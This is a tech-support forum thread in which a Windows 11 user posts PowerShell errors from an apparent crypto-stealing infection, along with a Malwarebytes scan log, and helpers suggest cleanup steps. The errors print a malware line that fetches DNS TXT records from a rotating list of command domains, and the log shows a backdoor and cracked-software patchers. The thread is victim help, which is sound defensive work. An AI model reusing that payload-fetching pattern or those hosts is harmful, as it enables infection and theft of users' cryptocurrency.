[SOLVED] Windows terminal pops up sometime with certain codes on my old laptop(windows 11 ) recently installed.Is it a virus or something??

[DangerPanda1999]

I face this situation many a times when i start my laptop recently, I have these contents pop up in 2 seperate powershell admin terminals. I got it installed by a friend of mine.

> 750XXXA1-7XXX-4XXX-9C6C-202XXXFC10B9

Resolve-DnsName : wmail-endpoint.com : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (wmail-endpoint.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-blog.com : DNS server failure
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (bideo-blog.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-blog.com : DNS server failure
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-blog.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-cdn.com : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-cdn.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-chat.com : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-chat.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-blog.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (fairu-blog.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-chat.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (fairu-chat.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-cdn.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (fairu-cdn.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-blog.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (bideo-blog.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-schnellvpn.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (bideo-schnellvpn.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-endpoint.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-endpoint.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-chat.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-chat.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-endpoint.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-endpoint.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-blog.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-blog.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-chat.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-chat.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-cdn.xyz : DNS name does not exist
At line:9 char:16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-cdn.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

AND


> 32XXX7C1-6XXX-4XXX-A0AX-C8B8XXX58567 > Resolve-DnsName : wmail-endpoint.com : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (wmail-endpoint.com:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : bideo-blog.com : DNS server failure > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (bideo-blog.com:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : privatproxy-blog.com : DNS server failure > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (privatproxy-blog.com:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : privatproxy-cdn.com : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (privatproxy-cdn.com:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : ahoravideo-chat.com : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (ahoravideo-chat.com:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : fairu-blog.xyz : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (fairu-blog.xyz:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : fairu-chat.xyz : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (fairu-chat.xyz:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : fairu-cdn.xyz : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (fairu-cdn.xyz:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : bideo-blog.xyz : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (bideo-blog.xyz:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : bideo-schnellvpn.xyz : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (bideo-schnellvpn.xyz:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : privatproxy-endpoint.xyz : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (privatproxy-endpoint.xyz:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : privatproxy-chat.xyz : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (privatproxy-chat.xyz:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : ahoravideo-endpoint.xyz : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (ahoravideo-endpoint.xyz:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : ahoravideo-blog.xyz : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (ahoravideo-blog.xyz:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : ahoravideo-chat.xyz : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (ahoravideo-chat.xyz:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName > > Resolve-DnsName : ahoravideo-cdn.xyz : DNS name does not exist > At line:9 char:16 > + $dns = Resolve-DnsName -Name $hostname -Type 'TXT' > + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > + CategoryInfo : ResourceUnavailable: (ahoravideo-cdn.xyz:String) [Resolve-DnsName], Win32Exception > + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

 

[Colif]

have you run anything like malwarebytes or Bitdefender Free?

that would be my 1st move

someone else with same files - similar links

https://www.pluribus-one.it/company/blog/84-cybersecurity/150-detecting-powershell-cryptostealer

its a crypto stealing virus - https://answers.microsoft.com/en-us...k-jojlns/131793d9-6844-41e4-8397-68a7576ec5d5

looks like network its trying to contact got taken down. It can't reach its payload.

 

[DangerPanda1999]

23 items
Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 11/27/22
Scan Time: 3:41 PM
Log File: e7bf4dea-6e3b-11ed-ae72-d45d64669f72.json

-Software Information-
Version: 4.5.18.226
Components Version: 1.0.1823
Update Package Version: 1.0.62790
License: Trial

-System Information-
OS: Windows 11 (Build 22621.675)
CPU: x64
File System: NTFS
User: DESKTOP-VN0AQ40\Admin

-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 307216
Threats Detected: 24
Threats Quarantined: 0
Time Elapsed: 9 min, 43 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Warn
PUM: Warn

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 4
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SPPEXTCOMOBJ.EXE, No Action By User, 6280, 1077834, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE, No Action By User, 6280, 1077833, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SPPEXTCOMOBJ.EXE, No Action By User, 6280, 1077834, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE, No Action By User, 6280, 1077833, 1.0.62790, , ame, , ,

Registry Value: 11
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SPPEXTCOMOBJ.EXE|VERIFIERDLLS, No Action By User, 6280, 1077834, 1.0.62790, , ame, , ,
PUM.Optional.DisableMRT, HKLM\SOFTWARE\WOW6432NODE\POLICIES\MICROSOFT\MRT|DONTOFFERTHROUGHWUAU, No Action By User, 6426, 676880, 1.0.62790, , ame, , ,
PUM.Optional.LowRiskFileTypes, HKU\S-1-5-19\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\ASSOCIATIONS|LOWRISKFILETYPES, No Action By User, 6090, 251589, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE|VERIFIERDLLS, No Action By User, 6280, 1077833, 1.0.62790, , ame, , ,
PUM.Optional.LowRiskFileTypes, HKU\S-1-5-21-816588136-875710598-2891341866-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\ASSOCIATIONS|LOWRISKFILETYPES, No Action By User, 6090, 251589, 1.0.62790, , ame, , ,
Backdoor.Agent.PDL, HKU\S-1-5-21-816588136-875710598-2891341866-1000\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|LOAD, No Action By User, 3815, 233556, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SPPEXTCOMOBJ.EXE|VERIFIERDLLS, No Action By User, 6280, 1077834, 1.0.62790, , ame, , ,
PUM.Optional.DisableMRT, HKLM\SOFTWARE\POLICIES\MICROSOFT\MRT|DONTOFFERTHROUGHWUAU, No Action By User, 6426, 676880, 1.0.62790, , ame, , ,
PUM.Optional.LowRiskFileTypes, HKU\S-1-5-20\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\ASSOCIATIONS|LOWRISKFILETYPES, No Action By User, 6090, 251589, 1.0.62790, , ame, , ,
RiskWare.IFEOHijack.KMS, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE|VERIFIERDLLS, No Action By User, 6280, 1077833, 1.0.62790, , ame, , ,
Adware.SearchEngineHijack, HKU\S-1-5-21-816588136-875710598-2891341866-1000\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Profile 1\extensions.settings|lokjgaehpcnlmkebpmjiofccpklbmoci, No Action By User, 391, 460702, , , , , ,

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 1
Adware.SearchEngineHijack, C:\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\LOKJGAEHPCNLMKEBPMJIOFCCPKLBMOCI, No Action By User, 391, 460702, 1.0.62790, , ame, , ,

File: 8
Adware.SearchEngineHijack, C:\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Profile 1\Secure Preferences, No Action By User, 391, 460702, , , , , 18CB3AAB3AFFE00B67BAFBA4D4EFB3A2, 6AFCC824899A029C622167819134EA84F6879767D7E7B997500256CD399DB6B1
Adware.SearchEngineHijack, C:\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Profile 1\Preferences, No Action By User, 391, 460702, , , , , F1AFBA59A6122C4FAED6C2066237E054, 86670387C897D36BF6BAF080E88AAA3F85A254D3B0E89103FABF7D9B7E98E023
Adware.SearchEngineHijack, C:\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\LOKJGAEHPCNLMKEBPMJIOFCCPKLBMOCI\2.18.3_0\MANIFEST.JSON, No Action By User, 391, 460702, 1.0.62790, , ame, , F4791B424E7144FE43B242934A18D801, 7B72CF6A42F0E8BBCEE5EDC63EE3613FD86A1D8E30E610CE1A049F9E63EDC228
Malware.Heuristic.1008, C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\TEMP2_PHOENIX LITEOS FLICKER FIXER V2.ZIP\PHOENIX LITEOS FLICKER FIXER\PHOENIX LITEOS FLICKER FIXER.EXE, No Action By User, 1000001, 0, 1.0.62790, 0000000000000000000003F0, dds, 02051524, 4BD3884A01F3A2DDD6C603C3A8A38B85, 5C41F59F080F3F7D5BACFA8BD74DAB9D308E9C5B4B2BB84F4D75FA3ADC334FEF
Malware.Heuristic.1008, C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\TEMP1_PHOENIX LITEOS FLICKER FIXER V2.ZIP\PHOENIX LITEOS FLICKER FIXER\PHOENIX LITEOS FLICKER FIXER.EXE, No Action By User, 1000001, 0, 1.0.62790, 0000000000000000000003F0, dds, 02051524, 4BD3884A01F3A2DDD6C603C3A8A38B85, 5C41F59F080F3F7D5BACFA8BD74DAB9D308E9C5B4B2BB84F4D75FA3ADC334FEF
Malware.AI.4051675685, C:\PROGRAMDATA\PHOENIXOS\0PTIONAL\ENABLE VIRTUAL MEMORY (RECOMMENDED!)\VIRTUAL MEMORY ENABLER.EXE, No Action By User, 1000000, -243291611, 1.0.62790, 8D3AB83E192AFBA8F17FAA25, dds, 02051524, 261B401323B32E3A0123A5E0B242DFAA, 02239C6E0236C99809EB60B8B38C46F115CC51019C6CBC1EB75D5CBCEA00F894
Generic.Malware/Suspicious, C:\PROGRAM FILES\IDM COMPUTER SOLUTIONS\ULTRAEDIT\IDM_UNIVERSAL_PATCH_V6.0_BY_DFOX.EXE, No Action By User, 0, 392686, 1.0.62790, , shuriken, , 042D3096173B754B931ED802DD976089, A5AF3175F6DFAC2BEDB8DC6EA06060EEEE93204343FBE17C2E117C619F4BA3A8
HackTool.FilePatch, C:\PROGRAM FILES (X86)\STARDOCK\FENCES\STARDOCK.FENCES.3.0.5.X64-PATCH.EXE, No Action By User, 7035, 281135, 1.0.62790, , ame, , A83C862CE356CE27AA1BCAD439DE71AC, 5405E5C8A154F6219C933DBA05EF3CA2D1162E666CD36B183BA8580F209C898E

Physical Sector: 0
(No malicious items detected)

WMI: 0
(No malicious items detected)


(end)

have you run anything like malwarebytes or Bitdefender Free?

that would be my 1st move

someone else with same files - similar links

https://www.pluribus-one.it/company/blog/84-cybersecurity/150-detecting-powershell-cryptostealer

its a crypto stealing virus - https://answers.microsoft.com/en-us...k-jojlns/131793d9-6844-41e4-8397-68a7576ec5d5

looks like network its trying to contact got taken down. It can't reach its payload.

 

[DangerPanda1999]

Did it but all i could gather was there was 2 kms activations in there

 

[Colif]

it could be a Firefox extension

i would look in startup items and see if anything odd
this shows everything that runs with windows. Can use it to stop things - just untick next to name
Run as admin as its from Microsoft - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns

https://forums.whirlpool.net.au/archive/3kpy5nr4

 

[DangerPanda1999]

i installed a firewall and all i noticed is a connection from power shell to cesar europe.com which seems to download suspicious binary file but it was blocked thanks to the fact that i had setting for the device to ask for save location before downloading

 

[Colif]

i seen that website before associated with virus infections. Bitdefender won't even let me visit it.

 

[DangerPanda1999]

Bro do you know how do we find this file it has failed due to taken down domains but i would better get rid of this forever but the problem is that it doesn't even register a s a positive in virustotal.

 

[Colif]

did you run autoruns as if its running at startup there should be something in it loading the files. It might show you the location there.